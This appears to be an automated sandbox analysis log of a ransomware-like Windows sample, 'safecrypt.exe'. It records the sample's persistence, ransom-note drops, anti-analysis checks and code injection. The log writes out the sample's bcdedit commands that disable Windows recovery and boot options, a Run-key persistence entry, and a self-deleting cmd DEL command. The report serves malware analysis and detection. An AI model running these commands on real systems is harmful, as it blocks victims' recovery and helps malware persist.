            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: safecrypt.exeStatic PE information: More than 200 imports for USER32.dll

            Data Obfuscation:

            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\safecrypt.exeUnpacked PE file: 1.2.safecrypt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\safecrypt.exeUnpacked PE file: 1.2.safecrypt.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042D27C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0042D27C
            Source: safecrypt.exeStatic PE information: real checksum: 0x510014b0 should be: 0x7b021
            Source: mllvvvh.exe.1.drStatic PE information: real checksum: 0x510014b0 should be: 0x7b021
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00428DC5 push ecx; ret 1_2_00428DD8
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00403FE9 push ebx; retn 0002h1_2_00403FEA
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00428DC5 push ecx; ret 1_1_00428DD8
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00403FE9 push ebx; retn 0002h1_1_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00428DC5 push ecx; ret 4_1_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00403FE9 push ebx; retn 0002h4_1_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00428DC5 push ecx; ret 20_2_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00403FE9 push ebx; retn 0002h20_2_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00428DC5 push ecx; ret 20_1_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00403FE9 push ebx; retn 0002h20_1_00403FEA
            Source: initial sampleStatic PE information: section name: .text entropy: 7.12605118752

            Persistence and Installation Behavior:

            Uses bcdedit to modify the Windows boot settings
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
            Source: C:\Users\user\Desktop\safecrypt.exeFile created: C:\Users\user\AppData\Roaming\mllvvvh.exeJump to dropped file

            Boot Survival:

            Creates autostart registry keys with suspicious names
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.png
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.html
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010

            Hooking and other Techniques for Hiding and Protection:

            Creates files in the recycle bin to hide itself
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File created: C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.png
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\Desktop\safecrypt.exe; File opened: C:\Users\user\Desktop\safecrypt.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File opened: C:\Users\user\AppData\Roaming\mllvvvh.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId
            Source: C:\Users\user\Desktop\safecrypt.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,FindCloseChangeNotification,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId
            Source: C:\Users\user\Desktop\safecrypt.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
            Source: C:\Users\user\Desktop\safecrypt.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
            Source: C:\Users\user\Desktop\safecrypt.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\Desktop\safecrypt.exe TID: 5056; Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 6012; Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 5784; Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 4936; Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 1936; Thread sleep time: -31000s >= -30000s
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_00413860 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread
            Source: C:\Users\user\Desktop\safecrypt.exe; Thread delayed: delay time: 31000
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Thread delayed: delay time: 31000
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW0zu%SystemRoot%\system32\mswsock.dllD#_
            Source: bcdedit.exe, 0000000E.00000002.344316029.000001F50D348000.00000004.00000020.sdmp; Binary or memory string: EFI VMware Virtual SATA CDROM Drive
            Source: bcdedit.exe, 00000010.00000002.349066454.000001EA568C9000.00000004.00000020.sdmp; Binary or memory string: pEFI VMware Virtual S<
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWen-USn
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: bcdedit.exe, 0000000B.00000002.339580407.00000212930D8000.00000004.00000020.sdmp; Binary or memory string: EFI VMware Virtual SATA CDROM Drive "
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: bcdedit.exe, 00000013.00000002.354186900.000001DE3DFD8000.00000004.00000020.sdmp; Binary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0042D27C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_00412C10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_1_00412C10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_00412C10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_2_00412C10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_1_00412C10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0042F826 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\safecrypt.exe; Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0042B7C3 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_1_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_1_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_1_0042B7C3 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 4_1_0042B7C3 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_2_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_2_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Code function: 20_2_0042B7C3 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion:

            Contains functionality to inject code into remote processes
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 0_2_02681828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\safecrypt.exe; Memory written: C:\Users\user\Desktop\safecrypt.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Memory written: C:\Users\user\AppData\Roaming\mllvvvh.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0041EB60 _memset,_memset,_memset,GetEnvironmentVariableW,_memset,ShellExecuteExW,ShellExecuteExW,GetLastError,Sleep,GetLastError,Sleep,ShellExecuteExW,CloseHandle
            Source: C:\Users\user\Desktop\safecrypt.exe; Process created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe'
            Source: C:\Users\user\Desktop\safecrypt.exe; Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE
